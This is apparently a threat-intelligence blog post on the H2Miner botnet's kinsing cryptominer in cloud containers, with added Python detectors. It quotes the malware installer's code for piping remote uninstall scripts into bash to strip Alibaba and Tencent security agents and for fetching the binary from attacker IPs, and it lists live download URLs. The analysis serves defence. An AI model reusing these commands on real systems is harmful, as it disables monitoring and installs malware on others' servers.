H2Miner botnet spreads container malware in cloud

Lacework Labs

Mar 25, 2020

Containers are gaining popularity as malware deployment mechanisms in the cloud. Beginning on Valentine’s Day, one malicious container started making its rounds and has steadily expanded to over 350 infections. The malware and infrastructure have been attributed to the “H2Miner” cryptomining botnet, which was last reported in January propagating via a Redis RCE: New Outbreak of h2Miner Worms Exploiting Redis RCE Detected.

Currently this activity is primarily targeting cloud servers in China. The following chart shows a breakdown of servers by organization. The vast majority belong to Chinese cloud providers such as Aliyun (Alibaba) and Tencent Cloud.

The malicious container was originally identified by searching on known malware artifacts in Shodan ( https://www.shodan.io/search?query=%22217.12.221.244%22 ). As shown in Figure 3, there is an observable command that downloads a bash installer, which in turn preps the system and then tries to download the final cryptomining payload.

Figure 3. Container malware observed in Shodan

The installer first attempts to remove competing cryptominers. It does this by grepping for other mining processes and network connections and terminating them if found. It also attempts to avoid detection by uninstalling the monitoring agents for Tencent Cloud and Alibaba Cloud. The targeted removal of these security agents is a likely reason for the concentration of infections among Tencent and Alibaba cloud servers.

if ps aux | grep -i '[a]liyun'; then
    # Alibaba Cloud (Aliyun) Aegis agent: vendor uninstallers fetched and piped to bash
    curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
    curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
    pkill aliyun-service
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    # bcm-agent cloud monitoring agent: stopped, then removed via whichever package manager exists
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
fi
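The agent-removal block above is a useful detection surface: none of these commands are unusual on their own, but a script that pipes the Aegis uninstaller into bash, kills aliyun-service and removes bcm-agent in one go is hard to mistake for administration. The following is an added example (not code from the post or from Lacework) of a small rule-based scanner that scores shell script text, or a shell command log, against that behaviour. The rule names, weights and threshold are our own choices, and the two sample scripts are constructed for the demonstration.

```python
import re

# Constructed excerpt modelled on the agent-removal section quoted in the post.
SAMPLE_INSTALLER = r"""
if ps aux | grep -i '[a]liyun'; then
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
fi
"""

# Constructed benign script for comparison: a pipe, but not into a shell.
SAMPLE_BENIGN = r"""
#!/bin/bash
systemctl restart nginx
curl -fsSL https://example.invalid/health | grep -q ok
"""

# Each rule: (name, compiled regex, weight). Names and weights are assumptions of this example.
RULES = [
    ("pipe_remote_script_to_shell",
     re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"), 3),
    ("aliyun_aegis_uninstall",
     re.compile(r"aegis\.aliyun\.com/download/\S*uninstall\.sh"), 5),
    ("kill_aliyun_service",
     re.compile(r"\bpkill\s+aliyun-service\b|\baliyun\.service\b"), 4),
    ("remove_bcm_agent",
     re.compile(r"\b(yum|apt-get)\s+remove\s+bcm-agent\b|service\s+bcm-agent\s+stop"), 4),
    ("delete_agent_files",
     re.compile(r"\brm\s+-rf\s+\S*(aegis|agentwatch|aliyun-service)"), 3),
]


def scan_script(text):
    """Return {rule_name: number_of_matches} for every rule that fires on the text."""
    hits = {}
    for name, pattern, _weight in RULES:
        count = len(pattern.findall(text))
        if count:
            hits[name] = count
    return hits


def risk_score(text):
    """Sum the weight of each distinct rule that fired (a rule counts once however often it matches)."""
    weights = {name: w for name, _p, w in RULES}
    return sum(weights[name] for name in scan_script(text))


def is_agent_removal(text, threshold=8):
    """Flag the text when the combined weight of matching rules reaches the threshold."""
    return risk_score(text) >= threshold


if __name__ == "__main__":
    for label, sample in (("installer", SAMPLE_INSTALLER), ("benign", SAMPLE_BENIGN)):
        print(label, risk_score(sample), scan_script(sample))
```

Scoring per distinct rule, rather than per match, keeps a long but harmless script from crossing the threshold on repetition alone; the installer excerpt fires all five rules, while the benign script fires none because its pipe ends in grep rather than a shell.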

The payload mining malware is known as “kinsing” and was previously reported on by Alibaba’s cloud security team. The installer downloads kinsing from one of two URLs and then verifies its MD5 hash (a71ad3167f9402d8c5388910862b16ae). The following shows the portion of the installer responsible for this:

download3() {
    $WGET $DIR/kinsing http://217.12.221.244/kinsing
    chmod +x $DIR/kinsing
    if [ -x "$(command -v md5sum)" ]; then
        sum=$(md5sum $DIR/kinsing | awk '{ print $1 }')
        echo $sum
        case $sum in
            a71ad3167f9402d8c5388910862b16ae)
                echo "kinsing OK"
                ;;
            *)
                echo "kinsing wrong"
                ;;
        esac
    else
        echo "No md5sum"
    fi
}

In addition to its cryptomining functionality, kinsing has remote administration features and the ability to run additional malware. Kinsing is a 64-bit ELF executable written in Go. There are a total of 15 variants on VirusTotal, with detection ratios ranging from 3/61 to 27/61. (Note: these were found by searching on the artifact “main.minerRunning”, which is unique to kinsing.)

All variants are hardcoded with the same C2 IPs:

One odd artifact in the kinsing binary is the presence of Shakespeare’s Hamlet, all five Acts of the entire play. The reason for this is unclear; it may be an attempt to confuse analysts by adding noise, or a crude technique for avoiding hash-based detections.
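The installer’s own MD5 check and the Hamlet padding illustrate the two sides of file-based detection: a hash pins one exact build, while a string artifact such as the Go symbol “main.minerRunning” survives any padding or recompilation that keeps the symbol name. The following is an added example (not code from the post or from Lacework) that scans a directory for both indicators and then shows, on a constructed stand-in file, that appending bulk text changes the hash but not the string match. The stand-in is a few bytes with an ELF magic and the symbol name, not a real sample; the hash is the one quoted from the installer above.

```python
import hashlib
import os
import tempfile

KINSING_MD5 = "a71ad3167f9402d8c5388910862b16ae"   # hash checked by the installer quoted in the post
KINSING_STRING = b"main.minerRunning"               # Go symbol the post describes as unique to kinsing


def md5_of_file(path):
    """Stream the file through MD5 so large binaries are not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def inspect_file(path):
    """Return (hash_match, string_match) for one file."""
    hash_match = md5_of_file(path) == KINSING_MD5
    with open(path, "rb") as f:
        string_match = KINSING_STRING in f.read()
    return hash_match, string_match


def scan_directory(root):
    """Walk root and return [(path, hash_match, string_match)] for every file with either hit."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                hash_match, string_match = inspect_file(path)
            except OSError:
                continue  # unreadable or vanished file; skip rather than abort the scan
            if hash_match or string_match:
                findings.append((path, hash_match, string_match))
    return findings


def demo():
    """Build a constructed stand-in (ELF magic + the Go symbol), scan it, pad it, scan again."""
    with tempfile.TemporaryDirectory() as tmp:
        sample = os.path.join(tmp, "kinsing_constructed")
        with open(sample, "wb") as f:
            f.write(b"\x7fELF" + b"\x00" * 60 + b"runtime.main\x00main.minerRunning\x00")
        before_hash = md5_of_file(sample)
        before = inspect_file(sample)
        # Append bulk text, standing in for the Hamlet padding: the hash moves, the symbol stays.
        with open(sample, "ab") as f:
            f.write(b"Though this be madness, yet there is method in't.\n" * 100)
        after_hash = md5_of_file(sample)
        after = inspect_file(sample)
        return {
            "hash_changed": before_hash != after_hash,
            "hash_match": after[0],        # False: the stand-in is not the real binary
            "string_before": before[1],
            "string_after": after[1],
            "findings": len(scan_directory(tmp)),
        }


if __name__ == "__main__":
    print(demo())
```

The practical takeaway is to keep the hash as a high-confidence indicator for the known build and rely on the string artifact (or a YARA rule built around it) to catch the variants with different hashes that the post counts on VirusTotal.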

Figure 4. Hamlet Artifacts: “Though this be madness, yet there is method in’t.”

The following are all known kinsing download URLs. The first two were observed in the most recent installer. All of the download URLs hosted on bitbucket are no longer online.

http://217.12.221.244/kinsing

https://bitbucket.org/kimganad81/git/raw/master/kinsing

http://142.44.191.122/kinsing

http://217.12.221.12/kinsing2

http://82.118.17.133/kinsing2

https://bitbucket.org/insane235n/git/raw/master/kinsing

https://bitbucket.org/orgaj125/git/raw/master/kinsing
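The URL list above is most useful once it is split into what can be blocked by host and what can only be matched by full URL: the bare IPs are single-purpose download hosts, but bitbucket.org serves plenty of legitimate traffic and must not be blocked wholesale. The following is an added example (not code from the post or from Lacework) that derives both indicator sets from the list and runs them over a few constructed egress-proxy log lines in a simple “timestamp source method url status” format of our own.

```python
from urllib.parse import urlparse

# Download URLs as listed in the post.
KINSING_URLS = [
    "http://217.12.221.244/kinsing",
    "https://bitbucket.org/kimganad81/git/raw/master/kinsing",
    "http://142.44.191.122/kinsing",
    "http://217.12.221.12/kinsing2",
    "http://82.118.17.133/kinsing2",
    "https://bitbucket.org/insane235n/git/raw/master/kinsing",
    "https://bitbucket.org/orgaj125/git/raw/master/kinsing",
]

# Hosts shared with legitimate users: match only the exact URL, never the whole host.
SHARED_HOSTS = {"bitbucket.org"}


def build_indicators(urls):
    """Return (hosts_to_block, exact_urls_to_match) derived from the URL list."""
    hosts, exact = set(), set()
    for u in urls:
        host = urlparse(u).hostname
        if host in SHARED_HOSTS:
            exact.add(u)
        else:
            hosts.add(host)
    return hosts, exact


# Constructed egress-proxy log lines (format assumed for this example): ts src method url status
SAMPLE_LOG = """\
2020-03-20T10:01:02Z 10.0.3.17 GET http://217.12.221.244/kinsing 200
2020-03-20T10:01:03Z 10.0.3.17 GET https://bitbucket.org/kimganad81/git/raw/master/kinsing 404
2020-03-20T10:02:00Z 10.0.3.18 GET https://bitbucket.org/myorg/repo/raw/master/README.md 200
2020-03-20T10:02:30Z 10.0.3.19 GET http://update.aegis.aliyun.com/download/uninstall.sh 200
2020-03-20T10:03:00Z 10.0.3.17 GET http://217.12.221.244/other 200
"""


def match_log(log_text, urls=KINSING_URLS):
    """Return [(ts, src, url, reason)] for lines hitting an exact URL or a blocked host."""
    hosts, exact = build_indicators(urls)
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # malformed line; skip
        ts, src, _method, url, _status = parts[:5]
        if url in exact:
            alerts.append((ts, src, url, "exact_url"))
        elif urlparse(url).hostname in hosts:
            alerts.append((ts, src, url, "c2_host"))
    return alerts


if __name__ == "__main__":
    for alert in match_log(SAMPLE_LOG):
        print(*alert)
```

Note that the second request to 217.12.221.244 is flagged even though its path is not on the list, while the unrelated bitbucket.org repository passes; the aegis uninstaller fetch is not in this indicator set at all, since on its own it is an administrative action and belongs with the behavioural rules rather than with network IoCs.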

Additional insight into the botnet was obtained by running the IPs through GreyNoise. GreyNoise is a useful search API that provides context on IPs which is unavailable elsewhere. As shown in Figure 4, several of the IPs running the containers were tagged as “Dockerd scanners” and “Kubernetes crawlers.”

Lacework believes the hosts installed with kinsing were subsequently recruited as scanners by the botnet for self-propagation purposes. While the specific propagation technique was not observed, it’s possibly leveraging the same Redis RCE from January. This is supported by the “Redis Scanner” tag which was the third most common among the hosts.

Cryptominers will likely expand their exploitation of cloud resources, especially during this unstable global economy. This has the potential to exacerbate the strain on cloud resources as more people are now working from home. Fortunately, the installation of these programs can easily be detected and mitigated with cloud security agents such as those provided by Lacework and other vendors.

If you found this blog useful then please share on your social media!

The following is a sampling of indicators. For a complete list, check out our GitHub repository: https://github.com/lacework/lacework-labs/blob/master/blog/h2miner.csv

Photo from Harrison Kugler via Unsplash

Originally published at https://www.lacework.com on March 25, 2020.
